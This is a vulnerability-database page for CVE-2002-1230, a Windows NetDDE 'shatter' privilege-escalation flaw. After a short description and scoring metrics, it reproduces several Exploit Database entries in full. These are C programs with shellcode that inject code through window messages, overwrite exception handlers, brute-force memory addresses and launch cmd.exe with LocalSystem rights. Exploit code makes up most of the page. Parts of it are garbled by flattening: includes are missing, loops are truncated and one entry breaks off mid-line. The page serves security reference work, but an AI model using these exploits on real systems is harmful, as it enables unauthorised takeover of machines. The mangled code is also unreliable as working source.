English
Français
Light
Dark
System

Alert System

Stay informed at all times
Create an account Open a free account Login Manage your alerts

CVE-2002-1230 : Detail

CVE-2002-1230

0.04%V3
Local
2004-09-01 02:00 +00:00
2007-11-12 23:00 +00:00
CVE.org
NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation."

Informations

Metrics

Metric Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21922

Publication date : 2002-10-08 22:00 +00:00
Author : Serus
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent. // /////////// Copyright Serus 2002//////////////// //mailto:serus@users.mns.ru // //This program check system on winlogon bug present //Only for Windows 2000 //This is for check use only! // #include #include void main(int argc, char *argv[ ], char *envp[ ] ) { char *buf; DWORD Addr = 0; BOOL bExec = TRUE; unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function, // executes cmd.exe on user`s desktop and creates mutex. 0x8B, 0xF4, 0x68, 0x53, 0x45, 0x52, 0x00, 0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00, 0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44, 0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C, 0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4, 0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3 }; HWND hWnd; COPYDATASTRUCT cds; HMODULE hMod; DWORD ProcAddr; HANDLE hMutex; char mutname[4]; printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ===="); // Get NetDDE Window hWnd = FindWindow("NDDEAgnt","NetDDE Agent"); if(hWnd == NULL) { MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP); return; } // Get CreateProcessA and CreateMutexA entry addresses hMod = GetModuleHandle("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 86 + 21) = ProcAddr; ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 15) = ProcAddr; //Generate random Mutex name srand(GetTickCount()); do { mutname[0] = 97 + rand()%25; mutname[1] = 65 + rand()%25; mutname[2] = 65 + rand()%25; mutname[3] = 0; } while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0); memcpy(sc + 3, mutname, 4); //Form buffer for SendMessage buf = (char *)malloc(1000); memset(buf, 0xC3, 1000); memcpy(buf, sc, sizeof(sc)); cds.cbData = 1000; cds.dwData = 0; cds.lpData=(PVOID)buf; //If first login //Send shellcode buffer SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); //Try execute it at 0x0080FA78 PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78); printf("\n\nTrying at 0x%X", 0x0080FA78); //If fails (perhaps not first login) //Try to bruteforce shellcode addresss for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } //Bug in winlogon not presents printf("\n\nBad luck! Reboot and try again.\n\n"); }
Exploit Database EDB-ID : 21923

Publication date : 2002-10-08 22:00 +00:00
Author : Serus
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent. /* GedAd2 */ // /////////// Copyright (c) 2002 Serus //////////////// //mailto:serus@users.mns.ru // //This program check system on winlogon bug present //Only for Windows 2000 and Windows XP //This is for check use only! // #include #include void main(int argc, char *argv[ ], char *envp[ ] ) { char *buf; DWORD Addr = 0; BOOL bExec = TRUE; unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function, // executes cmd.exe on user`s desktop and creates mutex. 0x8B, 0xF4, 0x68, 0x53, 0x45, 0x52, 0x00, 0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00, 0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44, 0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C, 0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4, 0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3 }; HWND hWnd; COPYDATASTRUCT cds; OSVERSIONINFO osvi; HMODULE hMod; DWORD ProcAddr; HANDLE hMutex; char mutname[4]; printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ===="); // Get NetDDE Window hWnd = FindWindow("NDDEAgnt","NetDDE Agent"); if(hWnd == NULL) { MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP); return; } // Get CreateProcessA and CreateMutexA entry addresses hMod = GetModuleHandle("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 86 + 21) = ProcAddr; ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateMutexA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 15) = ProcAddr; //Generate random Mutex name srand(GetTickCount()); do { mutname[0] = 97 + rand()%25; mutname[1] = 65 + rand()%25; mutname[2] = 65 + rand()%25; mutname[3] = 0; } while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0); memcpy(sc + 3, mutname, 4); //Form buffer for SendMessage buf = (char *)malloc(1000); memset(buf, 0xC3, 1000); memcpy(buf, sc, sizeof(sc)); cds.cbData = 1000; cds.dwData = 0; cds.lpData=(PVOID)buf; //Get OS version osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if(GetVersionEx(&osvi) == 0) { printf("\nWarning! Couldn't get OS verson. Trying as Win2k.\n"); osvi.dwMajorVersion = 5; } if(osvi.dwMajorVersion != 5) { MessageBox(NULL, "This program for Win2k and WinXP only!", "Error", MB_OK | MB_ICONSTOP); return; } if(osvi.dwMinorVersion == 0) { // Windows 2000 printf("\n\nUse Windows 2000 offsets"); //If first login //Send shellcode buffer SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); //Try execute it at 0x0080FA78 PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78); printf("\nTrying at 0x%X", 0x0080FA78); //If fails (perhaps not first login) //Try to bruteforce shellcode addresss for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } } else { // Windows XP printf("\n\nUse Windows XP offsets\n"); //Try to bruteforce shellcode addresss 0x00{A|B}4FA74 XP SP1 for(Addr = 0x00A0FA74; Addr < 0x01000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } } //Bug in winlogon not presents printf("\n\nBad luck! Try after first logon.\n\n"); } /* End GedAd2 */
Exploit Database EDB-ID : 21684

Publication date : 2002-08-05 22:00 +00:00
Author : sectroyer
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. //---------------------------UtlExp.c------------------------------ /****************************************************************** *sectroyer *Random Intruders * *The exploit uses two shatter vulnerabilities to cause *the execution of code. The first option isn't universal *but two others should work with any Win2k with any *language(of course on condition, that you will set *the correct main window title). * *sectroyer@go2.pl * *******************************************************************/ #include #include #include #define NOP 0x90 #define UEF long(__stdcall*)(_EXCEPTION_POINTERS*) // Local Cmd Shellcode unsigned char exec[]= "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xc0" // xor esi, esi "\x50" // push esi "\x68.exe" // push 'exe.' "\x68 cmd" // push 'cmd ' "\x40" // inc esi "\x50" // push esi "\x8d\x45\xF5" // lea edi, [ebp-0xf] "\x50" // push edi "\xb8XXXX" // mov eax, XXXX -> WinExec() "\xff\xd0" // call eax "\x33\xf6" // xor esi,esi "\x4e" // dec esi "\x50" // push esi "\xb8YYYY" // mov eax, YYYY -> ExitProcess() "\xff\xd0" // call eax "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\xC3"; // ret unsigned char buf[2048]; long hLVControl,hHdrControl,t=0; char *tWindow; char tWindowEn[]="Utility Manager";// The name of the main window char tWindowPl[]="Mened?er narz?dzi";// The name of the main window long sehHandler = 0x12345678; // Critical Address To Overwrite long shellcodeaddr = 0x7FFDE060; // Known Writeable Space Or Global Space long FindUnhandledExceptionFilter(); void doWrite(long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("Utility Manager Exploit written by sectroyer \n"); printf("Usage: %s
Exploit Database EDB-ID : 21685

Publication date : 2002-08-05 22:00 +00:00
Author : Oliver Lavery
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * CommCtrl 6.0 Button Shatter attack * * Demonstrates the use of windows messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - SEH_HANDLER_ADDR is the critical address to overwrite * - SHELLCODE_ADDR is the data space to inject the code * - KERN32_BASE_ADDR is the base address of kernel32 on your system * * Oliver Lavery * * Based on (and pretty much identical to) shatterseh2.c by * Brett Moore [ brett moore security-assessment com ] **********************************************************/ #include #define _WIN32_WINNT 0x501 #include #include // Local Cmd Shellcode. // Added a loadLibrary call to make sure msvcrt.dll is present -- ol BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="Calculator";// The name of the main window #define SEH_HANDLER_ADDR 0x77ed73B4 // Critical Address To Overwrite // you might want to find a less destructive spot to stick the code, but this works for me --ol #define SHELLCODE_ADDR 0x77ed7484 // Known Writeable Space Or Global Space // The range between these will be scanned to find our shellcode bytes. #define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32 #define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes. void doWrite(HWND hWnd, BYTE tByte, BYTE* address); void IterateWindows(long hWnd); void *FindByteInKernel32( BYTE byte ); void ErrorTrace(const char *msg, DWORD error) { DWORD numWritten; WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL); if (error) { LPTSTR lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL); // Free the buffer. LocalFree( lpMsgBuf ); } } //"Should there be a reason to believe that code that comes from a variety //of people, unknown from around the world, should be somehow of higher quality //than that from people who get paid to do it professionally?" // - Steve Ballmer // (Hey, wait, are MS employees generally household names? // Isn't MS an equal opportunity employer?) int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with CommCtrl 6.0 messages\n"); printf("%% Oliver Lavery.\n\n"); printf("%% based on Shatter SEH code by\n"); printf("%% brett moore security-assessment com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void *FindByteInKernel32( BYTE byte ) { BYTE *addr = KERN32_BASE_ADDR; while ( addr < KERN32_TOP_ADDR ) { if ( *addr == byte ) return addr; addr++; } ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 ); exit(0); } //"Should there be any reason to believe that a relatively small group of //paid programmers working under the direction of a marketing machine can produce //code approaching the quality of a global team linked by the internet, whose //every line of code is subject to ruthless peer review, and whose only standard //is excellence?" // - crunchie812 void doWrite(HWND hWnd, BYTE tByte, BYTE *address) { void *byte_addr; byte_addr = FindByteInKernel32( tByte ); SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr); if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) { ErrorTrace( "error", GetLastError() ); } } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); while ( strcmp(g_classNameBuf, "Button") ) { // IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); } if(childhWnd != NULL) { printf("+ Found button control..0x%xh\n",childhWnd); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR); for (looper=0;looper> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR+1); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR+2); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21686

Publication date : 2002-08-05 22:00 +00:00
Author : Brett Moore
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /************************************************************************************* * Statusbar Control Shatter exploit * * Demonstrates the use of a combination of windows messages to; * - brute force a useable heap address * - place structure information inside a process * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * - heapaddr is the base heap address to start brute forcing * * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues * Try it out against any program with a progress bar * *************************************************************************************/ #include #include #include // Local No Null Cmd Shellcode. BYTE exploit[] = "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\x5c\x21\x9d\x77\x03\xd9\xff\xd3\xcc\x90"; char g_classNameBuf[ 256 ]; char tWindow[]="Main Window Title";// The name of the main window long sehHandler = 0x7cXXXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x7fXXXXXX; // Known Writeable Space Or Global Space unsigned long heapaddr = 0x00500000; // Base Heap Address long mainhWnd; void doWrite(HWND hWnd, long tByte,long address); void BruteForceHeap(HWND hWnd); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { HMODULE hMod; DWORD ProcAddr; long x; printf("%% Playing with status bar messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); if (argc == 2) sscanf(argv[1],"%lx",&heapaddr); // Oddity printf("%% Using base heap address...0x%xh\n",heapaddr); printf("+ Finding %s Window...\n",tWindow); mainhWnd = (long)FindWindow(NULL,tWindow); if(mainhWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At......0x%xh\n",mainhWnd); IterateWindows(mainhWnd); printf("+ Done...\n"); return 0; } void BruteForceHeap(HWND hWnd, long tByte,long address) { long retval; BOOL foundHeap = FALSE; char buffer[5000]; memset(buffer,0,sizeof(buffer)); while (!foundHeap) { printf("+ Trying Heap Address.......0x%xh ",heapaddr); memset(buffer,0x58,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); printf("%d",retval); if(retval == 1) { // First Retval should be 1 memset(buffer,0x80,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); if(retval > 1) { // Second should be larger than 1 printf(" : %d - Found Heap Address\n",retval); return(0); } } printf("\n"); heapaddr += 2500; } } void doWrite(HWND hWnd, long tByte,long address) { char buffer[5000]; memset(buffer,0,sizeof(buffer)); memset(buffer,tByte,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Statusbar width SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr); SendMessage( hWnd,(UINT) SB_GETPARTS,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0) { // Find Heap Address BruteForceHeap((HWND) hWnd); // Inject shellcode to known address printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr); for (looper=0;looper> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21687

Publication date : 2002-08-05 22:00 +00:00
Author : Brett Moore
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /*************************************************************************** * Progress Control Shatter exploit * * Demonstrates the use of Progress Control messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 3 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * * Local shellcode loads relevant addresses * Try it out against any program with a progress bar * * Based on (and pretty much identical to) * mcafee-shatterseh2.c by * Oliver Lavery **************************************************************************** / #include #include #include // Local Cmd Shellcode. BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD 1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="Checking Disk C:\\";// The name of the main window long sehHandler = 0x7fXXXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x7fXXXXXX; // Known Writeable Space Or Global Space void doWrite(HWND hWnd, long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with progress bar messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Done...\n"); return 0; } void doWrite(HWND hWnd, long tByte,long address) { SendMessage( hWnd,(UINT) PBM_SETRANGE,0,MAKELPARAM(tByte , 20)); SendMessage( hWnd,(UINT) PBM_GETRANGE,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_progress32") ==0) { // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper> 8) & 0xff),sehHandler+1); doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21688

Publication date : 2002-08-05 22:00 +00:00
Author : Oliver Lavery
EDB Verified : Yes

